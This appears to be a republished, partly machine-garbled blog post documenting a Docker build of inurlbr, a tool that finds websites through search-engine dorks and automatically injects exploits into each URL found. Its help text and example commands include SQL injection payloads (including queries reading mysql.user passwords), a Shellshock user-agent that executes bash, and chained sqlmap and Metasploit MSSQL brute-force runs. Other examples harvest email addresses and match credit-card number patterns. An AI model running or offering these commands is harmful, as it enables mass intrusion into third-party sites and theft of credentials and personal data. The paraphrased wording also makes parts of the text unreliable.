Docker-Inurlbr - Advanced Search Inwards Search Engines, Enables Analysis Provided To Exploit Leave Of Absence / Post Capturing Emails & Urls

Advanced search inward search engines, enables analysis provided to exploit GET / POST capturing emails & urls, alongside an internal custom validation junction for each target / url found.

How to build
git clone cd docker-inurlbr docker create -t gmdutra/inurlbr .

docker run --name inurlbr -it -d gmdutra/inurlbr
  • HELP:

-h --help   Alternative long length care command. --ajuda  Command to specify Help. --info   Information script. --update Code update.     -q       Choose which search engine you lot desire through [1...24] / [e1..6]]:      [options]:      1   - GOOGLE / (CSE) GENERIC RANDOM / API      two   - BING      three   - YAHOO BR      4   - ASK      v   - HAO123 BR      six   - GOOGLE (API)      seven   - LYCOS      8   - UOL BR      nine   - YAHOO the States      10  - SAPO      xi  - DMOZ      12  - GIGABLAST      xiii  - NEVER      fourteen  - BAIDU BR      xv  - YANDEX      xvi  - ZOO      17  - HOTBOT      eighteen  - ZHONGSOU      xix  - HKSEARCH      xx  - EZILION      21  - SOGOU      22  - DUCK DUCK GO      23  - BOOROW      24  - GOOGLE(CSE) GENERIC RANDOM      ----------------------------------------                  SPECIAL MOTORS      ----------------------------------------      e1  - TOR FIND      e2  - ELEPHANT      e3  - TORSEARCH      e4  - WIKILEAKS      e5  - OTN      e6  - EXPLOITS SHODAN      ----------------------------------------      all - All search engines / non exceptional motors      Default:    1      Example: -q {op}      Usage:   -q 1               -q v                Using to a greater extent than than i engine:  -q 1,2,5,6,11,24                Using all engines:      -q all        --proxy Choose which proxy you lot desire to work through the search engine:      Example: --proxy {proxy:port}      Usage:   --proxy localhost:8118               --proxy socks5://googleinurl@localhost:9050               --proxy http://admin:12334@      --proxy-file Set font file to randomize your proxy to each search engine.      Example: --proxy-file {proxys}      Usage:   --proxy-file proxys_list.txt   --time-proxy Set the fourth dimension how oftentimes the proxy volition endure exchanged.      Example: --time-proxy {second}      Usage:   --time-proxy 10   --proxy-http-file Set file alongside urls http proxy,       are used to bular capch search engines      Example: --proxy-http-file {youfilehttp}      Usage:   --proxy-http-file http_proxys.txt             --tor-random Enables the TOR function, each usage links an unique IP.    -t  Choose the validation type: op 1, 2, 3, 4, v      [options]:      1   - The start type uses default errors considering the script:      It establishes connecter alongside the exploit through the instruct method.      Demo:{exploit}          two   -  The minute type tries to valid the mistake defined by: -a='VALUE_INSIDE_THE _TARGET'      It likewise establishes connecter alongside the exploit through the instruct method      Demo:{exploit}          three   - The 3rd type combine both start in addition to minute types:      Then, of course, it likewise establishes connecter alongside the exploit through the instruct method      Demo:{exploit}      Default:    1      Example: -t {op}      Usage:   -t 1            4   - The quaternary type a validation based on source file in addition to volition endure enabled scanner measure functions.      The source file their values are concatenated alongside target url.      - Set your target alongside ascendence --target {http://target}      - Set your file alongside ascendence -o {file}      Explicative:      Source file values:      /admin/index.php?id=      /pag/index.php?id=      /brazil.php?new=      Demo:{exploit}{exploit}{exploit}            v   - (FIND PAGE) The 5th type of validation based on the source file,      Will endure enabled solely i validation code 200 on the target server, or if the url submit such code volition endure considered vulnerable.      - Set your target alongside ascendence --target {http://target}      - Set your file alongside ascendence -o {file}      Explicative:      Source file values:      /admin/admin.php      /admin.asp      /admin.aspx      Demo:      Observation: If it shows the code 200 volition endure separated inward the output file       DEFAULT ERRORS:              [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK,       [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,      [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,      [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,      [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA,       [*]ERROR INDEFINITE                  --dork Defines which dork the search engine volition use.      Example: --dork {dork}      Usage:   --dork ' inurl:php? id'      - Using multiples dorks:      Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}      Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'    --dork-file Set font file alongside your search dorks.      Example: --dork-file {dork_file}      Usage:   --dork-file 'dorks.txt'   --exploit-get Defines which exploit volition endure injected through the GET method to each URL found.      Example: --exploit-get {exploit_get}      Usage:   --exploit-get "?'´%270x27;"        --exploit-post Defines which exploit volition endure injected through the POST method to each URL found.      Example: --exploit-post {exploit_post}      Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'        --exploit-command Defines which exploit/parameter volition endure executed inward the options: --command-vul/ --command-all.         The exploit-command volition endure identified yesteryear the paramaters: --command-vul/ --command-all equally _EXPLOIT_            Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'      _TARGET_ is the specified URL/TARGET obtained yesteryear the procedure      _EXPLOIT_ is the exploit/parameter defined yesteryear the selection --exploit-command.      Example: --exploit-command {exploit-command}      Usage:   --exploit-command '/admin/config.conf'          -a  Specify the string that volition endure used on the search script:      Example: -a {string}      Usage:   -a '<title>hello world</title>'        -d  Specify the script usage op 1, 2, 3, 4, 5.      Example: -d {op}      Usage:   -d 1 /URL of the search engine.               -d two /Show all the url.               -d three /Detailed asking of every URL.               -d 4 /Shows the HTML of every URL.               -d v /Detailed asking of all URLs.               -d six /Detailed PING - PONG irc.                    -s  Specify the output file where it volition endure saved the vulnerable URLs.            Example: -s {file}      Usage:   -s your_file.txt        -o  Manually care the vulnerable URLs you lot desire to work from a file, without using a search engine.      Example: -o {file_where_my_urls_are}      Usage:   -o tests.txt      --persist  Attempts when Google blocks your search.      The script tries to closed to other google host / default = 4      Example: --persist {number_attempts}      Usage:   --persist seven   --ifredirect  Return validation method post REDIRECT_URL      Example: --ifredirect {string_validation}      Usage:   --ifredirect '/admin/painel.php'   -m  Enable the search for emails on the urls specified.     -u  Enables the search for URL lists on the url specified.    --gc Enable validation of values ​​with google webcache.        --pr  Progressive scan, used to laid upwards operators (dorks),       makes the search of a dork in addition to valid results, therefore goes a dork at a time.     --file-cookie Open cookie file.        --save-as Save results inward a for sure place.   --shellshock Explore shellshock vulnerability yesteryear setting a malicious user-agent.    --popup Run --command all or vuln inward a parallel terminal.   --cms-check Enable uncomplicated cheque if the url / target is using CMS.   --no-banner Remove the script presentation banner.        --unique Filter results inward unique domains.   --beep Beep audio when a vulnerability is found.        --alexa-rank Show alexa positioning inward the results.        --robots Show values file robots.         --range Set attain IP.       Example: --range {range_start,rage_end}       Usage:   --range ''   --range-rand Set sum of random ips.       Example: --range-rand {rand}       Usage:   --range-rand '50'   --irc Sending vulnerable to IRC / server channel.       Example: --irc {server#channel}       Usage:   --irc ''   --http-header Set HTTP header.       Example: --http-header {youemail}       Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'             --sedmail Sending vulnerable to email.       Example: --sedmail {youemail}       Usage:   --sedmail             --delay Delay betwixt interrogation processes.       Example: --delay {second}       Usage:   --delay 10     --time-out Timeout to move out the process.       Example: --time-out {second}       Usage:   --time-out 10   --ifurl Filter URLs based on their argument.       Example: --ifurl {ifurl}       Usage:   --ifurl index.php?id=   --ifcode Valid results based on your render http code.       Example: --ifcode {ifcode}       Usage:   --ifcode 200    --ifemail Filter E-mails based on their argument.      Example: --ifemail {file_where_my_emails_are}      Usage:   --ifemail   --url-reference Define referring URL inward the asking to ship him against the target.       Example: --url-reference {url}       Usage:   --url-reference    --mp Limits the release of pages inward the search engines.      Example: --mp {limit}      Usage:   --mp l        --user-agent Define the user agent used inward its asking against the target.       Example: --user-agent {agent}       Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/'       Usage-exploit / SHELLSHOCK:          --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'       Complete command:           php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t two -a '99887766555'    --sall Saves all urls found yesteryear the scanner.      Example: --sall {file}      Usage:   --sall your_file.txt   --command-vul Every vulnerable URL found volition execute this ascendence parameters.      Example: --command-vul {command}      Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'               --command-vul './ _TARGET_ output.txt'               --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'                     --command-all Use this commmand to specify a unmarried ascendence to EVERY URL found.      Example: --command-all {command}      Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'               --command-all './ _TARGET_ output.txt'               --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'     [!] Observation:         _TARGET_ volition endure replaced yesteryear the URL/target found, although if the user       doesn't input the get, solely the domain volition endure executed.         _TARGETFULL_ volition endure replaced yesteryear the master copy URL / target found.             _TARGETXPL_ volition endure replaced yesteryear the master copy URL / target found + EXPLOIT --exploit-get.             _TARGETIP_ render of ip URL / target found.              _URI_ Back URL laid upwards of folders / target found.              _RANDOM_ Random strings.              _PORT_ Capture port of the electrical current test, inside the --port-scan process.         _EXPLOIT_  volition endure replaced yesteryear the specified ascendence declaration --exploit-command.    The exploit-command volition endure identified yesteryear the parameters --command-vul/ --command-all equally _EXPLOIT_   --replace Replace values ​​in the target URL.     Example:  --replace {value_old[INURL]value_new}      Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'               --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'               --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'                     --remove Remove values ​​in the target URL.       Example: --remove {string}       Usage:   --remove '/admin.php?id=0'                 --regexp Using regular human face to validate his research, the value of the      Expression volition endure sought inside the target/URL.     Example:  --regexp {regular_expression}     All Major Credit Cards:     Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'          IP Addresses:     Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'          EMAIL:        Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'        ---regexp-filter Using regular human face to filter his research, the value of the       Expression volition endure sought inside the target/URL.     Example:  ---regexp-filter {regular_expression}     EMAIL:        Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'        [!] Small commands manager:       --exploit-cad Command register for work inside the scanner.     Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}     Example Format: NMAP::nmap -sV _TARGET_     Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt     Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_'      Observation: Each registered ascendence is identified yesteryear an id of your array.                  Commands are logged inward exploits.conf file.   --exploit-all-id Execute commands, exploits based on id of use,     (all) is run for each target found yesteryear the engine.      Example: --exploit-all-id {id,id}      Usage:   --exploit-all-id 1,2,8,22            --exploit-vul-id Execute commands, exploits based on id of use,     (vull) run ascendence solely if the target was considered vulnerable.      Example: --exploit-vul-id {id,id}      Usage:   --exploit-vul-id 1,2,8,22   --exploit-list List all entries ascendence inward exploits.conf file.       [!] Running subprocesses:       --sub-file  Subprocess performs an injection       strings inward URLs found yesteryear the engine, via GET or POST.      Example: --sub-file {youfile}      Usage:   --sub-file exploits_get.txt            --sub-get defines whether the strings coming from       --sub-file volition endure injected via GET.      Usage:   --sub-get            --sub-post defines whether the strings coming from       --sub-file volition endure injected via POST.      Usage:   --sub-get             --sub-cmd-vul Each vulnerable URL found inside the sub-process      volition execute the parameters of this command.      Example: --sub-cmd-vul {command}      Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'               --sub-cmd-vul './ _TARGET_ output.txt'               --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'                     --sub-cmd-all Run ascendence to each target found inside the sub-process scope.      Example: --sub-cmd-all {command}      Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'               --sub-cmd-all './ _TARGET_ output.txt'               --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'    --port-scan Defines ports that volition endure validated equally open.      Example: --port-scan {ports}      Usage:   --port-scan '22,21,23,3306'            --port-cmd Define ascendence that runs when finding an opened upwards door.      Example: --port-cmd {command}      Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'               --port-cmd './xpl _TARGETIP_/file.php?sqli=1'   --port-write Send values for door.      Example: --port-write {'value0','value1','value3'}      Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"        [!] Modifying values used inside script parameters:       md5 Encrypt values inward md5.      Example: md5({value})      Usage:   md5(102030)      Usage:   --exploit-get 'user?id=md5(102030)'   base64 Encrypt values inward base64.      Example: base64({value})      Usage:   base64(102030)      Usage:   --exploit-get 'user?id=base64(102030)'            hex Encrypt values inward hex.      Example: hex({value})      Usage:   hex(102030)      Usage:   --exploit-get 'user?id=hex(102030)'   Generate random values.      Example: random({character_counter})      Usage:   random(8)      Usage:   --exploit-get 'user?id=random(8)' 

Simple Commands
docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"       docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"      docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"     docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t two --exploit-get '?' -a 'Index of /wp-content/uploads'     docker exec inurlbr ./inurlbr.php --dork ' intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t two --exploit-get '?' -a 'confidencial'     docker exec inurlbr ./inurlbr.php --dork ' intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t two --exploit-get '?' -a 'secreto'            docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"     docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'    docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?´0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'     docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'    docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/ -u "_TARGETFULL_" --dbs'    docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'   docker exec inurlbr ./inurlbr.php --dork ' email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'    docker exec inurlbr ./inurlbr.php --dork ' electronic mail (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m    docker exec inurlbr ./inurlbr.php --dork ' electronic mail (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u   docker exec inurlbr ./inurlbr.php --dork '' -s govs.txt --exploit-all-id  1,2,6     docker exec inurlbr ./inurlbr.php --dork '' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, similar Gecko)'    docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6    docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc ''       docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'     docker exec inurlbr ./inurlbr.php --target '' -o cancat_file_urls_find.txt -s output.txt -t 4    docker exec inurlbr ./inurlbr.php --target '' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"    docker exec inurlbr ./inurlbr.php --target '' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'    docker exec inurlbr ./inurlbr.php --target '' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t v    docker exec inurlbr ./inurlbr.php --range ',' -s output.txt --command-all 'php roteador.php _TARGETIP_'     docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'     docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8     docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr   docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock   docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt'  

----------------------------------------------                 Original Version ----------------------------------------------   [+] AUTOR:        googleINURL   [+] EMAIL:   [+] Blog: ----------------------------------------------                 Docker Version ----------------------------------------------   [+] AUTOR:        Gabriel Dutra (c0olr00t)   [+] EMAIL:   [+] LINKEDIN: ----------------------------------------------

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